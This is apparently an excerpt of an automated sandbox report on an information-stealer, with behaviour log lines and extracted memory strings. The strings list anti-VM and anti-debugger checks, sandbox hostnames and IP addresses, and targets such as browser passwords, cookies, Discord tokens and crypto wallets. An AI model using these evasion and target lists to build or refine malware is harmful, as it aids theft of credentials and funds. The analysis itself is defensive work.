                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\Desktop\EternalPredictor.exeMemory allocated: 1FC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeMemory allocated: 1BCF0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeMemory allocated: 2BC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeMemory allocated: 1AE80000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 1350000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 1AE10000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 1500000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\XClient.exeMemory allocated: 16E0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\EternalPredictor.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\eternal.exeWindow / User API: threadDelayed 8611Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3681
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3682
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2867
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 445
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2770
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5023
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3668
                        Source: C:\Users\user\AppData\Roaming\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\rar.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\select.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\python313.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_queue.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_socket.pydJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_sqlite3.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_lzma.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_decimal.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_ctypes.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_bz2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_ssl.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-17364
                        Source: C:\Users\user\AppData\Roaming\program.exeAPI coverage: 7.8 %
                        Source: C:\Users\user\Desktop\EternalPredictor.exe TID: 3552Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exe TID: 6424Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4040Thread sleep count: 3681 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6644Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4536Thread sleep count: 3682 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6996Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4648Thread sleep count: 2867 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7388Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4216Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 7308Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100Thread sleep count: 445 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7024Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 4216Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3032Thread sleep count: 5023 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5420Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5040Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep count: 3668 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\XClient.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Roaming\XClient.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C659280 FindFirstFileExW,FindClose,5_2_00007FF72C659280
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6583C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF72C6583C0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C671874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF72C671874
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C659280 FindFirstFileExW,FindClose,8_2_00007FF72C659280
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C671874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00007FF72C671874
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FF72C6583C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,8_2_00007FF72C6583C0
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 8_2_00007FFBA67A1230 GetSystemInfo,8_2_00007FFBA67A1230
                        Source: C:\Users\user\Desktop\EternalPredictor.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\XClient.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\program.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: getmac.exe, 00000047.00000002.1690693599.000002A33CDFE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1686883329.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1687922319.000002A33CDFD000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1687630217.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
                        Source: SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: Handshakemath/randClassINETAuthorityquestionsinfo_hashuser32.dllvmwaretrayxenservicevmwareusermegadumperscyllahidevirtualboxPxmdUOpVyxQ9IATRKPRHPaul Jonesd1bnJkfVlHQarZhrdBpjPC-DANIELEqarzhrdbpjq9iatrkprhd1bnjkfvlhJUDES-DOJOGJAm1NxXVmdOuyo8RV7105KvAUQKPQOf20XqH4VLpxmduopvyxJcOtj17dZxcM0uEGN4do64F2tKIqO5GexwjQdjXGfNBDSlDTXYmcafee.comnorton.comzillya.comsophos.comclamav.netpowershellsystemrootlogins.txtLogin DataChrome SxS360BrowserUR BrowserdiscordptbinitiationByHackirbysecure.datauto_startsteam-tempEpic Games.minecraftRiot GamesShowWindow-NoProfileExtensionsExodusWeb3PaliWalletwinsymlink/dev/stdinCreateFileterminatedowner diedDnsQuery_WGetIfEntryCancelIoExCreatePipeGetVersionWSACleanupWSAStartupgetsockoptsetsockoptdnsapi.dllws2_32.dllexecerrdotSYSTEMROOTavatar_url
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvmwareservice
                        Source: SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type TuesdayJanuaryOctoberMUI_StdMUI_DltAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutapdh.dllwindowswsarecvwsasendlookup writetoavx512fSHA-224SHA-256SHA-384SHA-512InstAltInstNopalt -> nop -> any -> NRGBA64tls3desderivedInitialExpiresSubjectcharsetos/execruntimeanswers]?)(.*)Ed25519MD5-RSAserial:eae_prk2.5.4.62.5.4.32.5.4.52.5.4.72.5.4.82.5.4.9amxtileamxint8amxbf16osxsavevmtoolsdvboxtraypestudiovmacthlpksdumperdebuggerstrongodgraywolf0harmonyreversalUSERNAMEEIEEIFYEGBQHURCCORXGKKZCoreleepcJBYQTQBOMARCI-PClmVwjj9bGRXNNIIELUCAS-PCjulia-pcXGNSVODUESPNHOOLORELEEPCVONRAHELTMKNGOMUJULIA-PC05h00Gi05ISYH9SHICQja5iTQZSBJVWMUspG1y1CecVtZ5wEBUiA1hkmOZFUCOD6o8yTi52Th7dk1xPrQORxJKNkgL50ksOpSqgFOf3Gj.seancedxd8DJ7clmvwjj9beset.com-CommandDisabled0.0.0.0 Web DataWaterfoxK-MeleonCyberfoxBlackHawUsernamePasswordBrowsers```%s```ChromiumElementsCatalinaQIP SurfpasswordbancairemetamaskdatabasePicturesOneDriveindex.jsSettingssettings.featherNovolinealts.txtPaladiumgames-%s
                        Source: SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: res binderres masterresumptionexp masterContent-IdMessage-IdHTTP_PROXYhttp_proxyhttp2debugcrypto/tlsParseAddr(invalid IPClassCSNETClassCHAOSAdditionalskipping: SHA256-RSASHA384-RSASHA512-RSADSA-SHA256ECDSA-SHA1base_noncePOSTALCODEavx512ifmaavx512vbmiavx512vnniavx512gfniavx512vaesavx512bf16EnumWindowsOpenProcessvboxservicecodecrackerBAROSINO-PCCOFFEE-SHOParchibaldpcARCHIBALDPCLANTECH-LLCALENMOOS-PC9yjCPsEYIMHnoK4zG7ZhOfOgJb6GqgK0OnZAp7UBVaS1xPLyvzr8sgCBvJChRPnsxnykj0egq7fzeuHUQIuwoEFUkFu0lQwgX5PryjIJKIrOMs4tgiizsLimS95.25.81.2435.199.6.1334.105.0.2780.211.0.9778.139.8.50totalav.comadaware.comThunderbirdTarget Pathcookies.txt%-70s %-70shistory.txtdescriptionCrypt32.dllLocal StateCentBrowserFiles Foundmot_de_passFatal ErrorMessageBoxW`
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
                        Source: program.exe, 00000008.00000003.1743204693.00000237A5926000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Moni
                        Source: getmac.exe, 00000047.00000003.1686883329.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1687630217.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
                        Source: getmac.exe, 00000047.00000002.1690693599.000002A33CDFE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1686883329.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1687922319.000002A33CDFD000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1687630217.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
                        Source: getmac.exe, 00000047.00000003.1687528519.000002A33CE15000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000002.1690693599.000002A33CE17000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1686883329.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1687362776.000002A33CE0F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport*
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 9fvmwaretray
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
                        Source: program.exe, 00000008.00000003.1743975302.00000237A5859000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4E1C000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1945952201.00000237A5859000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1715550482.00000237A5926000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f2vmusrvc
                        Source: skuld.exe, 00000003.00000002.1611437577.0000020F19FDC000.00000004.00000020.00020000.00000000.sdmp, SecurityHealthSystray.exe, 0000004A.00000002.1740450700.0000029DB581D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: SecurityHealthSystray.exe, 00000036.00000002.1740993816.00000206F4C2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkk
                        Source: getmac.exe, 00000047.00000002.1690693599.000002A33CDFE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1686883329.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1687922319.000002A33CDFD000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000047.00000003.1687630217.000002A33CDE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWrkProtocolRSV
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
                        Source: program.exe, 00000008.00000002.1939141033.00000237A49E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dytesqemu-ga
                        Source: SecurityHealthSystray.exe, 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: tznamerdtscppopcntempty rune1 RGBA64Gray16X25519%w%.0wAcceptServercmd/goheaderAnswerLengthSTREETavx512rdrandrdseedwebhookcryptosregeditollydbgdf5servvmusrvctaskmgrqemu-gafakenetfiddlerdumpcapsharpodsnifferpetoolsharmonycharlesphantomx32_dbgx64_dbgwpe pro3u2v9m8SERVER1MIKE-PCNETTYPClisa-pcHEUeRzljohn-pcZELJAVALISA-PCWILEYPCJOHN-PCserver1wileypcAIDANPC7DBgdxuJAW4Dz0cMkNdS6Mr.Nonej7pNjWMequZE3Jo6jdigqKUv3bT4ymONofgheuerzlIVwoKUFavg.comDefaultFirefoxMercuryAddressNetworkCookiesHistorykey4.dbThoriumIridiumVivaldiOrbitumMaxthonK-MelonSputnikSlimjetOperaGXaccountaddressDesktopcontentAppDatadiscordmodulesRoamingversionWindowsFeatherBadlionleveldbAPPDATACaption%.2f GBprofileDiscord`Nitro`.sqlitecmd.exeWallets\ArmoryCoinomiBinanceMartianPhantomSafepalSolfareiWalletLICENSEProtectfloat32float64readdirconsoleabortedCopySidWSARecvWSASendconnectsignal runningPATHEXT_pragmapragma _txlocknumber nil keyUpgradeTrailersocks5hHEADERSReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGname %q:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECT19531259765625FreeSidSleepExinvaliduintptrSwapperChanDir Value>Convert\\.\UNCforcegcallocmWcpuprofallocmRunknowngctraceIO waitsyscallwaitingforevernetworkUNKNOWN:events, goid= s=nil
